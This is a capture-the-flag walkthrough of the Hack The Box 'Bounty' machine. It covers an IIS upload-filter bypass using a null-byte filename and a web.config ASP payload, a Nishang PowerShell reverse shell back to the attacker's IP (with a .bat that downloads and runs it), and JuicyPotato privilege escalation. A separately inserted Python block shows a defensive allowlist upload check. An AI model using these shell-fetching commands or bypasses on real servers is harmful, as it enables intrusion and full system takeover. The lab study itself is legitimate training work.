Bounty HTB Walkthrough

1. Enumeration

Standard nmap enumeration on TCP ports

And here we have a wizard on the homepage, with no other UI elements except the image.

Looks like we will need to run dirbuster to brute force directories. Since the service is Microsoft IIS, we will be looking for aspx and asp files on top of the standard txt and php files.

So we have /uploadedfiles, which is forbidden; perhaps we can upload a file and then access it there. Only transfer.aspx is accessible, so let's go into that.

Ah. File upload. Looks like this is the only way in. But before that we need to figure out how to reach the file we will be uploading to the server.

Well, this is the only way in, though not through the uploadedFiles directory itself. Let's try uploading another image file.

I downloaded an apple image and named it test.jpeg

Upload had no issues

Well, /test.jpeg did not work, but that's not entirely a bad thing.

Because /uploadedfiles/test.jpeg worked! Great. Now we can try uploading a shell as an aspx file.

We use msfvenom to create a shell.aspx

Oh no. It did not work. Maybe we can intercept and modify the request to trick the server into thinking it is an image file. To do this, we require the services of Burp.

So over here, we rename shell.aspx to shell.aspx%00.jpg in the request to trick the server into thinking it is an image file.

And our trick worked; now we should be able to run the shell and catch the incoming connection with netcat.

Or so I thought it would be this easy. The file caused a server error, which means we need to find other file types we could upload.

2. Exploitation

A Google search for "IIS file upload exploit" reveals this link: https://soroush.secproject.com/blog/tag/unrestricted-file-upload/

One such header is titled “Running web.config as an ASP file”

Looks like we can upload shells as a web.config file instead
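Both bypasses seen so far (the %00 filename trick and the web.config upload) work because the form only blocklists script extensions. The following is an added example, not code from the box or the blog, that reconstructs that weak check beside an allowlist that closes both holes; the exact blocklist is an assumption, since the page never shows the server-side code.

```python
"""Upload-filename checks: a blocklist like the one the Bounty form appears
to use, beside an allowlist that rejects the same filenames safely."""
import os
from urllib.parse import unquote

# Script extensions an IIS blocklist typically rejects (assumed; the page
# never shows the server code). Note that .config is not on the list.
BLOCKED_SCRIPT_EXTS = {".asp", ".aspx", ".ashx", ".asmx"}
# What an image upload endpoint should actually accept.
ALLOWED_IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}
# Names IIS parses or executes in any served directory, never just serves.
RESERVED_NAMES = {"web.config", "global.asax"}


def blocklist_check(filename: str) -> bool:
    """Weak check: accept unless the final extension is a script type."""
    ext = os.path.splitext(filename)[1].lower()
    return ext not in BLOCKED_SCRIPT_EXTS


def allowlist_check(filename: str) -> bool:
    """Hardened check: decode, drop any path, reject control bytes and
    reserved names, and require exactly one allowed image extension."""
    name = unquote(filename)  # '%00' becomes a real NUL before use
    name = os.path.basename(name.replace("\\", "/"))
    if not name or any(ord(c) < 0x20 for c in name):
        return False  # NUL or other control byte: filename truncation trick
    lowered = name.lower()
    if lowered in RESERVED_NAMES:
        return False  # web.config would be applied by IIS, not served as data
    parts = lowered.split(".")
    if len(parts) != 2 or not parts[0]:
        return False  # rejects 'shell.aspx.jpg' style double extensions
    return "." + parts[1] in ALLOWED_IMAGE_EXTS


def compare(filename: str) -> tuple:
    """(blocklist verdict, allowlist verdict) for one submitted filename."""
    return (blocklist_check(filename), allowlist_check(filename))


if __name__ == "__main__":
    # Filenames from the walkthrough plus one double-extension variant.
    for f in ("test.jpeg", "shell.aspx", "shell.aspx%00.jpg", "web.config"):
        b, a = compare(f)
        print(f"{f:20} blocklist={b!s:5} allowlist={a}")
```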

This is the web.config file on the website

Now if it works, 3 will appear on the webpage!

And so we know it's correct! Now, because we know from the nmap enumeration that this is a Windows machine, we can use the Nishang PowerShell script to invoke a reverse shell that returns a PowerShell prompt to us!

This is the one we require

Here are examples in the script to show you how to use it

We want the ps1 file to run as soon as it is transferred, so we add "Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <port>" as the last line.

Replace the ASP in web.config with the one above.

Remember to start a Python server to host the file.

And we get a shell; the PS at the front of the prompt signifies that we are in a PowerShell.

3. Privilege Escalation

Checking whoami reveals that we need to escalate privileges. When we run whoami /priv to check our privileges, we see that SeImpersonatePrivilege is Enabled. When SeImpersonatePrivilege is enabled, we can use a tool called JuicyPotato:

https://github.com/ohpe/juicy-potato

Juicy Potato is a Local Privilege Escalation tool, from a Windows Service Account to NT AUTHORITY\SYSTEM. The summary and details are found in the GitHub link above!

Next we transfer the executable file

We run it to get the usage. You can see that it requires 3 arguments: -t, -p and -l.

The program we want to launch will be a reverse shell, as any program it runs will have SYSTEM privileges. We leave -t as * and the listening port will be the listening port we define in the reverse shell. For the rest we leave the defaults, unless the exploit does not work, in which case we might need to find the CLSID for this machine.

So now the reverse shell. We need a program on the victim's machine for JuicyPotato to execute in order for our exploit to work. For programs on Windows, we use a .bat file that contains our reverse shell script, and by reverse shell I mean the Nishang powershell .ps1 we used earlier, except the port number changes!

The same script, but a different port. So now -l will be 5555.

Our shell.bat file is relatively simple: it just invokes PowerShell to retrieve the ps1 file and run it.

Now we retrieve the bat file

Prep our listener

And we run our exploit!

Since there were no errors with our CLSID, it looks like we will get a successful connection.

And indeed we do, and it's nt authority\system, which confirms our successful exploit!

User.txt. Notice we use attrib because "dir" did not show any results, but we know for sure user.txt is in this folder as always; this time it is just hidden.

And root.txt

Overall quite a tedious machine, but the greatest takeaways any reader should have by this point are:

  1. Microsoft IIS -> aspx and asp files become important here
  2. If file upload is possible, check for file upload exploits specific to the software/platform
  3. Use JuicyPotato when SeImpersonatePrivilege is enabled.
  4. Optional: find out CLSIDs for as many types of Windows machine as you can -> it should be useful. http://ohpe.it/juicy-potato/CLSID/

Till the next machine. On a side note, it’s only 2 weeks before D-Day. Can’t wait to see the fruits of my labour! 😀